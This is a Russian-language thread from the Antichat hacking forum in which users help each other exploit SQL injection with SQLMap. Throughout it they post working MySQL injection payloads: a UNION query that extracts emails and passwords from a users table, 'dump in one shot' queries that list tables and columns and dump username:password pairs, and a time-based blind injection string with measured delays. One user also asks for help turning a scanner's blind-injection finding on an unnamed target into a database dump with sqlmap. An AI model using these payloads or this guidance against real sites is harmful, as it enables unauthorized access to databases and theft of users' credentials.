Форум АНТИЧАТ - Вопросы по SQLMap

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Вопросы по SQLMap (https://forum.antichat.xyz/showthread.php?t=431199)

Цитата:

Сообщение от Xsite

↑
может кто то помочь , привести в виду DIOSa ?
5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NUL
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL-- uBIi
хотя тут юнион , но при этом выводит 1 запись оч долго

может кто то помочь , привести в виду DIOSa ? - Это как?

Цитата:

Сообщение от BabaDook

↑
может кто то помочь , привести в виду DIOSa ? - Это как?

как то так

https://defcon.ru/web-security/2320/

что бы он не по одной записи "выплевывал"

Цитата:

Сообщение от Xsite

↑
как то так
https://defcon.ru/web-security/2320/
что бы он не по одной записи "выплевывал"

Ну, загугли dios mssql.

п.с может лимит убрать?

Цитата:

Сообщение от BabaDook

↑
Ну, загугли dios mssql.
п.с может лимит убрать?

это mysql

п.с зачем убирать лимит , если https://rdot.org/forum/showthread.php?t=124&page=2

SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM {TABLE_NAME} LIMIT {S},{N})r WHERE (@p:=concat_ws(0x2c,@p,{COLUMN_NAME}))>0))o

Цитата:

Сообщение от Xsite

↑
это mysql
п.с зачем убирать лимит , если
https://rdot.org/forum/showthread.php?t=124&page=2
SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM
{TABLE_NAME}
LIMIT
{S}
,
{N}
)r WHERE (@p:=concat_ws(0x2c,@p,
{COLUMN_NAME}
))>0))o

И как это к sqlmap относиться ?

Цитата:

Сообщение от Xsite

Код:

(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)  - таблицы

(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name={NAME_TABLE_HEX}) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x) - колонки

(select (@x) from (select (@x:=0x00),(select (0) from ({TABLE_NAME})where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password))))x) - данные

И да не в той теме пост

Можно ли мапой посмотреть размер БД,таблиц,колонок ?

Цитата:

Сообщение от karkajoi

↑
Можно ли мапой посмотреть размер БД,таблиц,колонок ?

та сразу юзай -D ... --columns --count

Имелось в виду не количество записей в той или оной таблице , а их вес в B,МB

Кто сможет помочь, Акунет нашел скулю слепую.

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.333
0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z => 9.471
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.449
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.776
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.608
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.581
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.463
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.504
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.7

Начинаю крутить Sql map пишу следующее

тут файл с куками и прочим -p "service" --dbs --threads 10 --time-sec 10 --risk=3 --level=5

Он мне пишет что параметр уязвим.

[16:58:49] [INFO] POST parameter 'service' appears to be 'HSQLDB >= 2.0 stacked queries (heavy query)' injectable

it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Но потом ничего не находит

каждый раз когда запускаю снова, выдает результат но уже другой вариант уязвимой версии =\

Что можно попробовать подскажите пожалуйста.